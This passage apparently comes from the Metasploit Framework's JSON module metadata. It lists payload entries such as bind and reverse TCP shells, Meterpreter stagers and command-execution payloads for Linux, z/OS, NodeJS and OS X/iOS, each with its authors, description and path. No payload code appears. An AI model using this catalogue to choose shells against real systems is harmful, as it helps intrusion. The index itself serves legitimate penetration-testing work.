"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"kris katterjohn <katterjohn@gmail.com>",
"egypt <egypt@metasploit.com>",
"OJ Reeves"
],
"description": "Spawn a command shell (staged). Listen for an IPv6 connection with UUID Support (Linux x86)",
"references": [
],
"platform": "Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/linux/x86/bind_ipv6_tcp_uuid.rb",
"is_install_path": true,
"ref_name": "linux/x86/shell/bind_ipv6_tcp_uuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x86/shell/bind_nonx_tcp": {
"name": "Linux Command Shell, Bind TCP Stager",
"full_name": "payload/linux/x86/shell/bind_nonx_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>"
],
"description": "Spawn a command shell (staged). Listen for a connection",
"references": [
],
"platform": "Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/linux/x86/bind_nonx_tcp.rb",
"is_install_path": true,
"ref_name": "linux/x86/shell/bind_nonx_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x86/shell/bind_tcp": {
"name": "Linux Command Shell, Bind TCP Stager (Linux x86)",
"full_name": "payload/linux/x86/shell/bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"egypt <egypt@metasploit.com>"
],
"description": "Spawn a command shell (staged). Listen for a connection (Linux x86)",
"references": [
],
"platform": "Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/linux/x86/bind_tcp.rb",
"is_install_path": true,
"ref_name": "linux/x86/shell/bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x86/shell/bind_tcp_uuid": {
"name": "Linux Command Shell, Bind TCP Stager with UUID Support (Linux x86)",
"full_name": "payload/linux/x86/shell/bind_tcp_uuid",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"egypt <egypt@metasploit.com>",
"OJ Reeves"
],
"description": "Spawn a command shell (staged). Listen for a connection with UUID Support (Linux x86)",
"references": [
],
"platform": "Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/linux/x86/bind_tcp_uuid.rb",
"is_install_path": true,
"ref_name": "linux/x86/shell/bind_tcp_uuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x86/shell/find_tag": {
"name": "Linux Command Shell, Find Tag Stager",
"full_name": "payload/linux/x86/shell/find_tag",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>"
],
"description": "Spawn a command shell (staged). Use an established connection",
"references": [
],
"platform": "Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/linux/x86/find_tag.rb",
"is_install_path": true,
"ref_name": "linux/x86/shell/find_tag",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x86/shell/reverse_ipv6_tcp": {
"name": "Linux Command Shell, Reverse TCP Stager (IPv6)",
"full_name": "payload/linux/x86/shell/reverse_ipv6_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"kris katterjohn <katterjohn@gmail.com>"
],
"description": "Spawn a command shell (staged). Connect back to attacker over IPv6",
"references": [
],
"platform": "Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/linux/x86/reverse_ipv6_tcp.rb",
"is_install_path": true,
"ref_name": "linux/x86/shell/reverse_ipv6_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x86/shell/reverse_nonx_tcp": {
"name": "Linux Command Shell, Reverse TCP Stager",
"full_name": "payload/linux/x86/shell/reverse_nonx_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>"
],
"description": "Spawn a command shell (staged). Connect back to the attacker",
"references": [
],
"platform": "Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/linux/x86/reverse_nonx_tcp.rb",
"is_install_path": true,
"ref_name": "linux/x86/shell/reverse_nonx_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x86/shell/reverse_tcp": {
"name": "Linux Command Shell, Reverse TCP Stager",
"full_name": "payload/linux/x86/shell/reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"egypt <egypt@metasploit.com>",
"tkmru"
],
"description": "Spawn a command shell (staged). Connect back to the attacker",
"references": [
],
"platform": "Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-08-15 08:02:51 +0000",
"path": "/modules/payloads/stagers/linux/x86/reverse_tcp.rb",
"is_install_path": true,
"ref_name": "linux/x86/shell/reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x86/shell/reverse_tcp_uuid": {
"name": "Linux Command Shell, Reverse TCP Stager",
"full_name": "payload/linux/x86/shell/reverse_tcp_uuid",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"egypt <egypt@metasploit.com>",
"OJ Reeves"
],
"description": "Spawn a command shell (staged). Connect back to the attacker",
"references": [
],
"platform": "Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-08-15 08:02:51 +0000",
"path": "/modules/payloads/stagers/linux/x86/reverse_tcp_uuid.rb",
"is_install_path": true,
"ref_name": "linux/x86/shell/reverse_tcp_uuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x86/shell_bind_ipv6_tcp": {
"name": "Linux Command Shell, Bind TCP Inline (IPv6)",
"full_name": "payload/linux/x86/shell_bind_ipv6_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"kris katterjohn <katterjohn@gmail.com>"
],
"description": "Listen for a connection over IPv6 and spawn a command shell",
"references": [
],
"platform": "Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/linux/x86/shell_bind_ipv6_tcp.rb",
"is_install_path": true,
"ref_name": "linux/x86/shell_bind_ipv6_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x86/shell_bind_tcp": {
"name": "Linux Command Shell, Bind TCP Inline",
"full_name": "payload/linux/x86/shell_bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>"
],
"description": "Listen for a connection and spawn a command shell",
"references": [
],
"platform": "Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-01 04:57:42 +0000",
"path": "/modules/payloads/singles/linux/x86/shell_bind_tcp.rb",
"is_install_path": true,
"ref_name": "linux/x86/shell_bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x86/shell_bind_tcp_random_port": {
"name": "Linux Command Shell, Bind TCP Random Port Inline",
"full_name": "payload/linux/x86/shell_bind_tcp_random_port",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Geyslan G. Bem <geyslan@gmail.com>"
],
"description": "Listen for a connection in a random port and spawn a command shell.\n Use nmap to discover the open port: 'nmap -sS target -p-'.",
"references": [
],
"platform": "Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-01 04:57:42 +0000",
"path": "/modules/payloads/singles/linux/x86/shell_bind_tcp_random_port.rb",
"is_install_path": true,
"ref_name": "linux/x86/shell_bind_tcp_random_port",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x86/shell_find_port": {
"name": "Linux Command Shell, Find Port Inline",
"full_name": "payload/linux/x86/shell_find_port",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>"
],
"description": "Spawn a shell on an established connection",
"references": [
],
"platform": "Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-01 04:57:42 +0000",
"path": "/modules/payloads/singles/linux/x86/shell_find_port.rb",
"is_install_path": true,
"ref_name": "linux/x86/shell_find_port",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x86/shell_find_tag": {
"name": "Linux Command Shell, Find Tag Inline",
"full_name": "payload/linux/x86/shell_find_tag",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>"
],
"description": "Spawn a shell on an established connection (proxy/nat safe)",
"references": [
],
"platform": "Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/linux/x86/shell_find_tag.rb",
"is_install_path": true,
"ref_name": "linux/x86/shell_find_tag",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x86/shell_reverse_tcp": {
"name": "Linux Command Shell, Reverse TCP Inline",
"full_name": "payload/linux/x86/shell_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>",
"joev <joev@metasploit.com>"
],
"description": "Connect back to attacker and spawn a command shell",
"references": [
],
"platform": "Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-01 04:57:42 +0000",
"path": "/modules/payloads/singles/linux/x86/shell_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "linux/x86/shell_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x86/shell_reverse_tcp_ipv6": {
"name": "Linux Command Shell, Reverse TCP Inline (IPv6)",
"full_name": "payload/linux/x86/shell_reverse_tcp_ipv6",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Matteo Malvica <matteo@malvica.com>"
],
"description": "Connect back to attacker and spawn a command shell over IPv6",
"references": [
],
"platform": "Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-07-23 13:38:25 +0000",
"path": "/modules/payloads/singles/linux/x86/shell_reverse_tcp_ipv6.rb",
"is_install_path": true,
"ref_name": "linux/x86/shell_reverse_tcp_ipv6",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/zarch/meterpreter_reverse_http": {
"name": "Linux Meterpreter, Reverse HTTP Inline",
"full_name": "payload/linux/zarch/meterpreter_reverse_http",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "Linux",
"arch": "zarch",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-11 09:43:17 +0000",
"path": "/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb",
"is_install_path": true,
"ref_name": "linux/zarch/meterpreter_reverse_http",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/zarch/meterpreter_reverse_https": {
"name": "Linux Meterpreter, Reverse HTTPS Inline",
"full_name": "payload/linux/zarch/meterpreter_reverse_https",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "Linux",
"arch": "zarch",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-11 09:43:17 +0000",
"path": "/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb",
"is_install_path": true,
"ref_name": "linux/zarch/meterpreter_reverse_https",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/zarch/meterpreter_reverse_tcp": {
"name": "Linux Meterpreter, Reverse TCP Inline",
"full_name": "payload/linux/zarch/meterpreter_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "Linux",
"arch": "zarch",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-11 09:43:17 +0000",
"path": "/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "linux/zarch/meterpreter_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_mainframe/shell_reverse_tcp": {
"name": "Z/OS (MVS) Command Shell, Reverse TCP Inline",
"full_name": "payload/mainframe/shell_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Bigendian Smalls"
],
"description": "Listen for a connection and spawn a command shell.\n This implementation does not include ebcdic character translation,\n so a client with translation capabilities is required. MSF handles\n this automatically.",
"references": [
],
"platform": "Mainframe",
"arch": "zarch",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-17 16:00:04 +0000",
"path": "/modules/payloads/singles/mainframe/shell_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "mainframe/shell_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_multi/meterpreter/reverse_http": {
"name": "Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Mulitple Architectures)",
"full_name": "payload/multi/meterpreter/reverse_http",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"OJ Reeves"
],
"description": "Handle Meterpreter sessions regardless of the target arch/platform. Tunnel communication over HTTP",
"references": [
],
"platform": "Multi",
"arch": "x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, tty, java, ruby, dalvik, python, nodejs, firefox, zarch, r",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/multi/reverse_http.rb",
"is_install_path": true,
"ref_name": "multi/meterpreter/reverse_http",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_multi/meterpreter/reverse_https": {
"name": "Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Mulitple Architectures)",
"full_name": "payload/multi/meterpreter/reverse_https",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"OJ Reeves"
],
"description": "Handle Meterpreter sessions regardless of the target arch/platform. Tunnel communication over HTTPS",
"references": [
],
"platform": "Multi",
"arch": "x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, tty, java, ruby, dalvik, python, nodejs, firefox, zarch, r",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/multi/reverse_https.rb",
"is_install_path": true,
"ref_name": "multi/meterpreter/reverse_https",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_netware/shell/reverse_tcp": {
"name": "NetWare Command Shell, Reverse TCP Stager",
"full_name": "payload/netware/shell/reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"toto"
],
"description": "Connect to the NetWare console (staged). Connect back to the attacker",
"references": [
],
"platform": "Netware",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/netware/reverse_tcp.rb",
"is_install_path": true,
"ref_name": "netware/shell/reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_nodejs/shell_bind_tcp": {
"name": "Command Shell, Bind TCP (via nodejs)",
"full_name": "payload/nodejs/shell_bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"joev <joev@metasploit.com>"
],
"description": "Creates an interactive shell via nodejs",
"references": [
],
"platform": "NodeJS",
"arch": "nodejs",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-10-11 11:09:28 +0000",
"path": "/modules/payloads/singles/nodejs/shell_bind_tcp.rb",
"is_install_path": true,
"ref_name": "nodejs/shell_bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_nodejs/shell_reverse_tcp": {
"name": "Command Shell, Reverse TCP (via nodejs)",
"full_name": "payload/nodejs/shell_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"RageLtMan",
"joev <joev@metasploit.com>"
],
"description": "Creates an interactive shell via nodejs",
"references": [
],
"platform": "NodeJS",
"arch": "nodejs",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-11-21 13:53:33 +0000",
"path": "/modules/payloads/singles/nodejs/shell_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "nodejs/shell_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_nodejs/shell_reverse_tcp_ssl": {
"name": "Command Shell, Reverse TCP SSL (via nodejs)",
"full_name": "payload/nodejs/shell_reverse_tcp_ssl",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"RageLtMan",
"joev <joev@metasploit.com>"
],
"description": "Creates an interactive shell via nodejs, uses SSL",
"references": [
],
"platform": "NodeJS",
"arch": "nodejs",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-11-21 13:53:33 +0000",
"path": "/modules/payloads/singles/nodejs/shell_reverse_tcp_ssl.rb",
"is_install_path": true,
"ref_name": "nodejs/shell_reverse_tcp_ssl",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_osx/armle/execute/bind_tcp": {
"name": "OS X Write and Execute Binary, Bind TCP Stager",
"full_name": "payload/osx/armle/execute/bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"hdm <x@hdm.io>"
],
"description": "Spawn a command shell (staged). Listen for a connection",
"references": [
],
"platform": "OSX",
"arch": "armle",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/osx/armle/bind_tcp.rb",
"is_install_path": true,
"ref_name": "osx/armle/execute/bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_osx/armle/execute/reverse_tcp": {
"name": "OS X Write and Execute Binary, Reverse TCP Stager",
"full_name": "payload/osx/armle/execute/reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"hdm <x@hdm.io>"
],
"description": "Spawn a command shell (staged). Connect back to the attacker",
"references": [
],
"platform": "OSX",
"arch": "armle",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/osx/armle/reverse_tcp.rb",
"is_install_path": true,
"ref_name": "osx/armle/execute/reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_osx/armle/shell/bind_tcp": {
"name": "OS X Command Shell, Bind TCP Stager",
"full_name": "payload/osx/armle/shell/bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"hdm <x@hdm.io>"
],
"description": "Spawn a command shell (staged). Listen for a connection",
"references": [
],
"platform": "OSX",
"arch": "armle",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/osx/armle/bind_tcp.rb",
"is_install_path": true,
"ref_name": "osx/armle/shell/bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_osx/armle/shell/reverse_tcp": {
"name": "OS X Command Shell, Reverse TCP Stager",
"full_name": "payload/osx/armle/shell/reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"hdm <x@hdm.io>"
],
"description": "Spawn a command shell (staged). Connect back to the attacker",
"references": [
],
"platform": "OSX",
"arch": "armle",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/osx/armle/reverse_tcp.rb",
"is_install_path": true,
"ref_name": "osx/armle/shell/reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_osx/armle/shell_bind_tcp": {
"name": "Apple iOS Command Shell, Bind TCP Inline",
"full_name": "payload/osx/armle/shell_bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"hdm <x@hdm.io>"
],
"description": "Listen for a connection and spawn a command shell",
"references": [
],
"platform": "OSX",
"arch": "armle",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/osx/armle/shell_bind_tcp.rb",
"is_install_path": true,
"ref_name": "osx/armle/shell_bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_osx/armle/shell_reverse_tcp": {
"name": "Apple iOS Command Shell, Reverse TCP Inline",
"full_name": "payload/osx/armle/shell_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"hdm <x@hdm.io>"
],
"description": "Connect back to attacker and spawn a command shell",
"references": [
],
"platform": "OSX",
"arch": "armle",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/osx/armle/shell_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "osx/armle/shell_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_osx/armle/vibrate": {
"name": "Apple iOS iPhone Vibrate",
"full_name": "payload/osx/armle/vibrate",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"hdm <x@hdm.io>"
],
"description": "Causes the iPhone to vibrate, only works when the AudioToolkit library has been loaded.\n Based on work by Charlie Miller <cmiller[at]securityevaluators.com>.",
"references": [
],
"platform": "OSX",
"arch": "armle",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/osx/armle/vibrate.rb",
"is_install_path": true,
"ref_name": "osx/armle/vibrate",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_osx/ppc/shell/bind_tcp": {
"name": "OS X Command Shell, Bind TCP Stager",
"full_name": "payload/osx/ppc/shell/bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"hdm <x@hdm.io>"
],
"description": "Spawn a command shell (staged). Listen for a connection",
"references": [
],
"platform": "OSX",
"arch": "ppc",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/osx/ppc/bind_tcp.rb",
"is_install_path": true,
"ref_name": "osx/ppc/shell/bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_osx/ppc/shell/find_tag": {
"name": "OS X Command Shell, Find Tag Stager",
"full_name": "payload/osx/ppc/shell/find_tag",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"hdm <x@hdm.io>"
],
"description": "Spawn a command shell (staged). Use an established connection",
"references": [
],
"platform": "OSX",
"arch": "ppc",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/osx/ppc/find_tag.rb",
"is_install_path": true,
"ref_name": "osx/ppc/shell/find_tag",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_osx/ppc/shell/reverse_tcp": {
"name": "OS X Command Shell, Reverse TCP Stager",
"full_name": "payload/osx/ppc/shell/reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"hdm <x@hdm.io>"
],
"description": "Spawn a command shell (staged). Connect back to the attacker",
"references": [
],
"platform": "OSX",
"arch": "ppc",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/osx/ppc/reverse_tcp.rb",
"is_install_path": true,
"ref_name": "osx/ppc/shell/reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_osx/ppc/shell_bind_tcp": {
"name": "OS X Command Shell, Bind TCP Inline",
"full_name": "payload/osx/ppc/shell_bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"hdm <x@hdm.io>"
],
"description": "Listen for a connection and spawn a command shell",
"references": [
],
"platform": "OSX",
"arch": "ppc",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/osx/ppc/shell_bind_tcp.rb",
"is_install_path": true,
"ref_name": "osx/ppc/shell_bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_osx/ppc/shell_reverse_tcp": {
"name": "OS X Command Shell, Reverse TCP Inline",
"full_name": "payload/osx/ppc/shell_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"hdm <x@hdm.io>"
],
"description": "Connect back to attacker and spawn a command shell",
"references": [
],
"platform": "OSX",
"arch": "ppc",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/osx/ppc/shell_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "osx/ppc/shell_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_osx/x64/dupandexecve/bind_tcp": {
"name": "OS X dup2 Command Shell, Bind TCP Stager",
"full_name": "payload/osx/x64/dupandexecve/bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"nemo",
"nemo <nemo@felinemenace.org>"
],
"description": "dup2 socket in edi, then execve. Listen, read length, read buffer, execute",
"references": [
],
"platform": "OSX",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/osx/x64/bind_tcp.rb",
"is_install_path": true,
"ref_name": "osx/x64/dupandexecve/bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_osx/x64/dupandexecve/reverse_tcp": {
"name": "OS X dup2 Command Shell, Reverse TCP Stager",
"full_name": "payload/osx/x64/dupandexecve/reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"nemo",
"nemo <nemo@felinemenace.org>"
],
"description": "dup2 socket in edi, then execve. Connect, read length, read buffer, execute",
"references": [
],
"platform": "OSX",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-01-10 15:06:08 +0000",
"path": "/modules/payloads/stagers/osx/x64/reverse_tcp.rb",
"is_install_path": true,
"ref_name": "osx/x64/dupandexecve/reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_osx/x64/exec": {
"name": "OS X x64 Execute Command",
"full_name": "payload/osx/x64/exec",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"argp <argp@census-labs.com>",
"joev <joev@metasploit.com>"
],
"description": "Execute an arbitrary command",
"references": [
],
"platform": "OSX",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/osx/x64/exec.rb",
"is_install_path": true,
"ref_name": "osx/x64/exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_osx/x64/meterpreter/bind_tcp": {
"name": "OSX Meterpreter, Bind TCP Stager",
"full_name": "payload/osx/x64/meterpreter/bind_tcp",
"rank": 300,
"disclosure_date": null,
